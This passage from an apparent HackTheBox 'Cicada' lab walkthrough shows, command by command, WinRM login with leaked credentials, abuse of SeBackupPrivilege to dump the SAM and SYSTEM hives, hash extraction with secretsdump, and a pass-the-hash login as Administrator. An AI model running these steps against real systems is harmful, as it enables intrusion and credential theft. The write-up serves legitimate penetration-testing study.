$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"
|
we found another credentials!! emily.oscars:Q!3@Lp#M6b*7t*Vt. Luckily, she is the high value target we just mentioned!
WinRM with emily
1
2
3
4
5
| ┌──(wzwr㉿kali)-[~/Documents/htb/cicada]
└─$ crackmapexec winrm 10.10.11.35 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'
SMB 10.10.11.35 5985 CICADA-DC [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb)
HTTP 10.10.11.35 5985 CICADA-DC [*] http://10.10.11.35:5985/wsman
WINRM 10.10.11.35 5985 CICADA-DC [+] cicada.htb\emily.oscars:Q!3@Lp#M6b*7t*Vt (Pwn3d!)
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| ┌──(wzwr㉿kali)-[~/Documents/htb/cicada]
└─$ evil-winrm -i cicada.htb -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami
cicada\emily.oscars
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> type ../Desktop/user.txt
2c3e7e1e316bfc32597e9401505d2b39
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents>
|
Post Exploitation
Recall that we knows that emily is the high value target as she have remote connect privileges and its belong to backup operator group, this usually implies she have backup privileges.
Privileges Check
1
2
3
4
5
6
7
8
9
10
11
12
13
| *Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents>
|
Indeed, she does have SeBackupPrivilege, we can try to abuse this to obtain NTLM Hash of the machine.
Abuse
1
2
3
4
5
6
7
| *Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg save hklm\sam C:\Users\emily.oscars.CICADA\Documents\sam.hive
The operation completed successfully.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg save hklm\system C:\Users\emily.oscars.CICADA\Documents\system.hive
The operation completed successfully.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents>
|
Then, we transfer sam.hive and system.hive to our kali.
1
2
3
4
5
6
7
8
9
10
11
| ┌──(wzwr㉿kali)-[~/Documents/htb/cicada]
└─$ impacket-secretsdump -sam sam.hive -system system.hive LOCAL
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...
|
Login As Administrator
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| ┌──(wzwr㉿kali)-[~/Documents/htb/cicada]
└─$ evil-winrm -i cicada.htb -u 'Administrator' -H '2b87e7c93a3e8a0ea4a581937016f341'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
cicada\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../Desktop/root.txt
450a37e2437bccb9112ad8704f6ae19b
*Evil-WinRM* PS C:\Users\Administrator\Documents>
|
